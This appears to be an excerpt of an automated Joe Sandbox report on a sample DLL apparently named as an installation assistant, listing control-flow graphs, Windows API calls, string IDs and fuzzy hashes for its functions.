                                          • Instruction Fuzzy Hash: 60A15832A041449FCF09CF78C9597AE7BB1AF4B328F194269E811EF790CB35A806DB51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7002 6c78c1e0-6c78c239 call 6c7b6b70 7005 6c78c260-6c78c269 7002->7005 7006 6c78c26b-6c78c270 7005->7006 7007 6c78c2b0-6c78c2b5 7005->7007 7008 6c78c2f0-6c78c2f5 7006->7008 7009 6c78c272-6c78c277 7006->7009 7010 6c78c330-6c78c335 7007->7010 7011 6c78c2b7-6c78c2bc 7007->7011 7012 6c78c2fb-6c78c300 7008->7012 7013 6c78c431-6c78c448 WriteFile 7008->7013 7016 6c78c27d-6c78c282 7009->7016 7017 6c78c372-6c78c3df WriteFile 7009->7017 7014 6c78c489-6c78c4b9 call 6c7bb3a0 7010->7014 7015 6c78c33b-6c78c340 7010->7015 7018 6c78c2c2-6c78c2c7 7011->7018 7019 6c78c407-6c78c41b 7011->7019 7020 6c78c452-6c78c47f call 6c7bb920 ReadFile 7012->7020 7021 6c78c306-6c78c30b 7012->7021 7013->7020 7014->7005 7023 6c78c4be-6c78c4c3 7015->7023 7024 6c78c346-6c78c36d 7015->7024 7025 6c78c288-6c78c28d 7016->7025 7026 6c78c3e9-6c78c3fd WriteFile 7016->7026 7017->7026 7028 6c78c23b-6c78c250 7018->7028 7029 6c78c2cd-6c78c2d2 7018->7029 7027 6c78c41f-6c78c42c 7019->7027 7020->7014 7021->7005 7030 6c78c311-6c78c32b 7021->7030 7023->7005 7033 6c78c4c9-6c78c4d7 7023->7033 7031 6c78c253-6c78c258 7024->7031 7025->7005 7034 6c78c28f-6c78c2aa 7025->7034 7026->7019 7027->7005 7028->7031 7029->7005 7035 6c78c2d4-6c78c2e7 7029->7035 7030->7027 7031->7005 7034->7031 7035->7031
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: :uW$;uW$;uW$> 4!$> 4!
                                          • API String ID: 0-4100612575
                                          • Opcode ID: 4914bdc44ae117a4faac5dfe211340df65d1976e7a51825e4fcf8082be744eef
                                          • Instruction ID: 067513532343ea36e9e062d1c4f777c7908afd11e35c8392842daf95439f1f6e
                                          • Opcode Fuzzy Hash: 4914bdc44ae117a4faac5dfe211340df65d1976e7a51825e4fcf8082be744eef
                                          • Instruction Fuzzy Hash: 07716EB02093459FD710DF54C580B5ABBE4FF8A709F108A3EF698D6650D371D8589B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: K?Jo$K?Jo$`Rlx$7eO
                                          • API String ID: 0-174837320
                                          • Opcode ID: 04797e77253e218d8c06333c79e58bb129616aeb9e7b8b0fba78a9ca8bed30f8
                                          • Instruction ID: ba8c12577788029b601f321423ceb0268066e3908288eaf62eaf5fee0c87fb8d
                                          • Opcode Fuzzy Hash: 04797e77253e218d8c06333c79e58bb129616aeb9e7b8b0fba78a9ca8bed30f8
                                          • Instruction Fuzzy Hash: B3428B7460A381DFCB54CF29C990A1ABBE2AFC9314F249D2EE69587B20D734E445CB53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ;T55
                                          • API String ID: 0-2572755013
                                          • Opcode ID: 6b58fc113ab39f5df9349fe8c721ee6cb28530002a5343f6176a4d5d9ae26893
                                          • Instruction ID: 778062063f2608983bc371f27897f2dd89179f64c28aacc7f8235df7c5f47b99
                                          • Opcode Fuzzy Hash: 6b58fc113ab39f5df9349fe8c721ee6cb28530002a5343f6176a4d5d9ae26893
                                          • Instruction Fuzzy Hash: 29030431645B018FC728CF28C8D0696B7E3EFD5328719CB2DC0AA4BA95DB74B44ACB55

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7579 6c7b4ff0-6c7b5077 CreateProcessA 7580 6c7b50ca-6c7b50d3 7579->7580 7581 6c7b50f0-6c7b510b 7580->7581 7582 6c7b50d5-6c7b50da 7580->7582 7581->7580 7583 6c7b50dc-6c7b50e1 7582->7583 7584 6c7b5080-6c7b50c2 WaitForSingleObject CloseHandle * 2 7582->7584 7583->7580 7585 6c7b50e3-6c7b5118 7583->7585 7584->7580
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: D
                                          • API String ID: 963392458-2746444292
                                          • Opcode ID: 05e60addf816329b8b1e08408034ba26a9fbf984199f46ba926d1f0209bea490
                                          • Instruction ID: 039b76dd7a62185e8e03bee6cb8c2720635693b42b036e9b2947063dde9a1a16
                                          • Opcode Fuzzy Hash: 05e60addf816329b8b1e08408034ba26a9fbf984199f46ba926d1f0209bea490
                                          • Instruction Fuzzy Hash: A431E2708097408FD750DF28D29872ABBF0EBDA318F505A1DF49996250E7759588CF87

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7587 6c7cbc5e-6c7cbc7a 7588 6c7cbe39 7587->7588 7589 6c7cbc80-6c7cbc82 7587->7589 7590 6c7cbe3b-6c7cbe3f 7588->7590 7591 6c7cbca4-6c7cbcc5 7589->7591 7592 6c7cbc84-6c7cbc97 call 6c7bf9df call 6c7bf9cc call 6c7c0120 7589->7592 7593 6c7cbccc-6c7cbcd2 7591->7593 7594 6c7cbcc7-6c7cbcca 7591->7594 7607 6c7cbc9c-6c7cbc9f 7592->7607 7593->7592 7596 6c7cbcd4-6c7cbcd9 7593->7596 7594->7593 7594->7596 7598 6c7cbcea-6c7cbcfb call 6c7cbe40 7596->7598 7599 6c7cbcdb-6c7cbce7 call 6c7cac69 7596->7599 7608 6c7cbd3c-6c7cbd4e 7598->7608 7609 6c7cbcfd-6c7cbcff 7598->7609 7599->7598 7607->7590 7610 6c7cbd95-6c7cbdb7 WriteFile 7608->7610 7611 6c7cbd50-6c7cbd59 7608->7611 7612 6c7cbd26-6c7cbd32 call 6c7cbeb1 7609->7612 7613 6c7cbd01-6c7cbd09 7609->7613 7614 6c7cbdb9-6c7cbdbf GetLastError 7610->7614 7615 6c7cbdc2 7610->7615 7617 6c7cbd5b-6c7cbd5e 7611->7617 7618 6c7cbd85-6c7cbd93 call 6c7cc2c3 7611->7618 7621 6c7cbd37-6c7cbd3a 7612->7621 7619 6c7cbd0f-6c7cbd1c call 6c7cc25b 7613->7619 7620 6c7cbdcb-6c7cbdce 7613->7620 7614->7615 7622 6c7cbdc5-6c7cbdca 7615->7622 7624 6c7cbd75-6c7cbd83 call 6c7cc487 7617->7624 7625 6c7cbd60-6c7cbd63 7617->7625 7618->7621 7629 6c7cbd1f-6c7cbd21 7619->7629 7623 6c7cbdd1-6c7cbdd6 7620->7623 7621->7629 7622->7620 7630 6c7cbdd8-6c7cbddd 7623->7630 7631 6c7cbe34-6c7cbe37 7623->7631 7624->7621 7625->7623 7632 6c7cbd65-6c7cbd73 call 6c7cc39e 7625->7632 7629->7622 7635 6c7cbddf-6c7cbde4 7630->7635 7636 6c7cbe09-6c7cbe15 7630->7636 7631->7590 7632->7621 7641 6c7cbdfd-6c7cbe04 call 6c7bf9f2 7635->7641 7642 6c7cbde6-6c7cbdf8 call 6c7bf9cc call 6c7bf9df 7635->7642 7639 6c7cbe1c-6c7cbe2f call 6c7bf9cc call 6c7bf9df 7636->7639 7640 6c7cbe17-6c7cbe1a 7636->7640 7639->7607 7640->7588 7640->7639 7641->7607 7642->7607
                                          APIs
                                            • Part of subcall function 6C7CBEB1: GetConsoleCP.KERNEL32(?,6C7CB0D0,?), ref: 6C7CBEF9
                                          • WriteFile.KERNEL32(?,?,6C7D46EC,00000000,00000000,?,00000000,00000000,6C7D5AB6,00000000,00000000,?,00000000,6C7CB0D0,6C7D46EC,00000000), ref: 6C7CBDAF
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C7D46EC,6C7CB0D0,00000000,?,?,?,?,00000000,?), ref: 6C7CBDB9
                                          • __dosmaperr.LIBCMT ref: 6C7CBDFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                          • String ID: 8Q
                                          • API String ID: 251514795-4022487301
                                          • Opcode ID: 7b39e18c50eae5b6d915b511bc5eae0bd8c84d48d782a0e71f2b2bffaabd2a90
                                          • Instruction ID: 077e35427226e5b17d54c2096e0054dfab99b54902fb52b6da897a9abaa18fa0
                                          • Opcode Fuzzy Hash: 7b39e18c50eae5b6d915b511bc5eae0bd8c84d48d782a0e71f2b2bffaabd2a90
                                          • Instruction Fuzzy Hash: A151E675B0020BAFDB01DFB8CA49BEEBB79EF0A718F140461F510A7A51D730A945C7A2

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7654 6c7b5b90-6c7b5b9c 7655 6c7b5b9e-6c7b5ba9 7654->7655 7656 6c7b5bdd 7654->7656 7657 6c7b5bab-6c7b5bbd 7655->7657 7658 6c7b5bbf-6c7b5bcc call 6c6801f0 call 6c7c0b18 7655->7658 7659 6c7b5bdf-6c7b5c57 7656->7659 7657->7658 7668 6c7b5bd1-6c7b5bdb 7658->7668 7661 6c7b5c59-6c7b5c81 7659->7661 7662 6c7b5c83-6c7b5c89 7659->7662 7661->7662 7664 6c7b5c8a-6c7b5d49 call 6c682250 call 6c682340 call 6c7b9379 call 6c67e010 call 6c7b7088 7661->7664 7668->7659
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C7B5D31
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 323602529-1866435925
                                          • Opcode ID: 9641cef81e73100d25ac9aa6cb9135671550cabdc5da146cd6e6cdf48f314447
                                          • Instruction ID: 59a6a745aa9010556903581bc8429c3d093849c4e1cc338e1860de8eefa60849
                                          • Opcode Fuzzy Hash: 9641cef81e73100d25ac9aa6cb9135671550cabdc5da146cd6e6cdf48f314447
                                          • Instruction Fuzzy Hash: 2B5143B5900B008FD725CF29C995B97BBF1FB88318F108A2DD8865BB91D775B909CB90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7699 6c7cb925-6c7cb939 call 6c7d15a2 7702 6c7cb93f-6c7cb947 7699->7702 7703 6c7cb93b-6c7cb93d 7699->7703 7705 6c7cb949-6c7cb950 7702->7705 7706 6c7cb952-6c7cb955 7702->7706 7704 6c7cb98d-6c7cb9ad call 6c7d171f 7703->7704 7716 6c7cb9af-6c7cb9b9 call 6c7bf9f2 7704->7716 7717 6c7cb9bb 7704->7717 7705->7706 7708 6c7cb95d-6c7cb971 call 6c7d15a2 * 2 7705->7708 7709 6c7cb957-6c7cb95b 7706->7709 7710 6c7cb973-6c7cb983 call 6c7d15a2 CloseHandle 7706->7710 7708->7703 7708->7710 7709->7708 7709->7710 7710->7703 7720 6c7cb985-6c7cb98b GetLastError 7710->7720 7718 6c7cb9bd-6c7cb9c0 7716->7718 7717->7718 7720->7704
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,6C7D425F), ref: 6C7CB97B
                                          • GetLastError.KERNEL32(?,00000000,?,6C7D425F), ref: 6C7CB985
                                          • __dosmaperr.LIBCMT ref: 6C7CB9B0
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLast__dosmaperr
                                          • String ID:
                                          • API String ID: 2583163307-0
                                          • Opcode ID: 5166734577c85417f385b93bd3efa12f3871acdec2e105b3e787b27b0e2d3124
                                          • Instruction ID: 07abe0b108ce122cc9efcea071e60ea51471bc42ab75701b4c0ac4f36e2de6f0
                                          • Opcode Fuzzy Hash: 5166734577c85417f385b93bd3efa12f3871acdec2e105b3e787b27b0e2d3124
                                          • Instruction Fuzzy Hash: 1A014833B451219FC611067A974D79E3B654F83B3CF2A0369F81687AC0CB61F8898292

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 7944 6c7c0b9c-6c7c0ba7 7945 6c7c0bbe-6c7c0bcb 7944->7945 7946 6c7c0ba9-6c7c0bbc call 6c7bf9cc call 6c7c0120 7944->7946 7948 6c7c0bcd-6c7c0be2 call 6c7c0cb9 call 6c7c873e call 6c7c9c60 call 6c7cb898 7945->7948 7949 6c7c0c06-6c7c0c0f call 6c7cae75 7945->7949 7957 6c7c0c10-6c7c0c12 7946->7957 7963 6c7c0be7-6c7c0bec 7948->7963 7949->7957 7964 6c7c0bee-6c7c0bf1 7963->7964 7965 6c7c0bf3-6c7c0bf7 7963->7965 7964->7949 7965->7949 7966 6c7c0bf9-6c7c0c05 call 6c7c47bb 7965->7966 7966->7949
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8Q
                                          • API String ID: 0-4022487301
                                          • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                          • Instruction ID: d1521ca9d6ed7517a9bd6c10c33c9891ec03f29ba3ff07f7b0855960948a17ec
                                          • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                          • Instruction Fuzzy Hash: 42F0ADB67016566EC6311E3A8F0CADA36989F5237CF100715E86092AD0DB70940A86E3
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C7B5AB4
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C7B5AF4
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID:
                                          • API String ID: 323602529-0
                                          • Opcode ID: 27d1e74daf21d532288ae5089d17e1198f359adc2010ad4e2c5ca87c162013d0
                                          • Instruction ID: 700f472e0618d61eaff3d9e377deeb0302e8c53a46b1839cce672ac11dc52c94
                                          • Opcode Fuzzy Hash: 27d1e74daf21d532288ae5089d17e1198f359adc2010ad4e2c5ca87c162013d0
                                          • Instruction Fuzzy Hash: 93514571101B00DBE725CF24C989BE6BBE4BB05718F448A1CE4AA5BBA1DB30B548CB80
                                          APIs
                                          • GetLastError.KERNEL32(6C7E6DD8,0000000C), ref: 6C7BEF52
                                          • ExitThread.KERNEL32 ref: 6C7BEF59
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ErrorExitLastThread
                                          • String ID:
                                          • API String ID: 1611280651-0
                                          • Opcode ID: 2714b6f1ec35ab792fdee3efe49efc9f558214334db95f064f8931487dde139b
                                          • Instruction ID: a8e37dd3a2ecd7d6c00cabeaaaf0b76228cd60a27a13764092cf34854624fddb
                                          • Opcode Fuzzy Hash: 2714b6f1ec35ab792fdee3efe49efc9f558214334db95f064f8931487dde139b
                                          • Instruction Fuzzy Hash: 64F0C2B2A00609AFDF049FB0C60DAAE3B74FF45318F144699E405A7B50CB349A05DBA2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: 02c7d79f9b6fc060145b3c9a7d2dd8d22b64cdd1d144dab2f867b8f735db7897
                                          • Instruction ID: 2fa982062b62a8b488ca1befac0b9f6f023afb1216f1c7bcec3371f1b74b49b2
                                          • Opcode Fuzzy Hash: 02c7d79f9b6fc060145b3c9a7d2dd8d22b64cdd1d144dab2f867b8f735db7897
                                          • Instruction Fuzzy Hash: AF114C71A0420EAFCF05CF59E94599B7BF8EF89318F154069F805AB301D671E911CBA5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                          • Instruction ID: a8052f6bb848e9b1b80fb4ff5ac67ebeb10da25c98de450128d00043cf619058
                                          • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                          • Instruction Fuzzy Hash: 70014F72D01159BFCF019FA8CE099EE7FB5AF08314F1541A5ED24E26A0E7319A24EB91
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000000,?,6C7D4115,?,?,00000000,?,6C7D4115,00000000,0000000C), ref: 6C7D4474
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: cd61e296575fc5c0ab68013c2e7ded51405388bbe05d7821cd416183d0213fb7
                                          • Instruction ID: ca0233a4e6a2c7c7c1587d777d86393361c97674e4ba54a4d3c5e7a7aaeb9e57
                                          • Opcode Fuzzy Hash: cd61e296575fc5c0ab68013c2e7ded51405388bbe05d7821cd416183d0213fb7
                                          • Instruction Fuzzy Hash: CAD06C3210010DBBDF029F84DC06EDA3BAAFB8C714F014010BA1896020C732E861AB94
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
